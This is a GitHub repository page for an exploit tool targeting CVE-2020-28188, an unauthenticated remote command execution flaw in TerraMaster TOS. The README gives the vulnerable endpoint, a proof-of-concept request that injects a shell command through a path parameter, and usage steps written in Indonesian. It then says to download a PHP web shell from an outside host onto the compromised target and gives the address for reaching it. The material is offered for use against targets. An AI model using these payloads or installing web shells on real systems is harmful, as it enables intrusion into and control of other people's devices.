Skip to content

Dark-Clown-Security/RCE_TOS

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits

README.md

README.md

 
 

rce.py

rce.py

 
 

Repository files navigation

RCE_TOS

Unauthenticated Remote Command Execution
CVE-2020-28188
Vulnerable page: /include/makecvs.php
Vulnerable parameter: Event
Proof of Concept:
GET /tos/index.php?explorer/pathList&path=%60touch%20/tmp/file%60 HTTP/1.1

Cara Menggunakan

pip install requests
python3 RCE.PY --url target.com:8181

Upload Shell

wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php

akses shell : http://target.com/shell.php

About

RCE _ TOS

darkclownsecurity.prg

Resources

Readme
Activity
Custom properties

Stars

4 stars

Watchers

1 watching

Forks

6 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages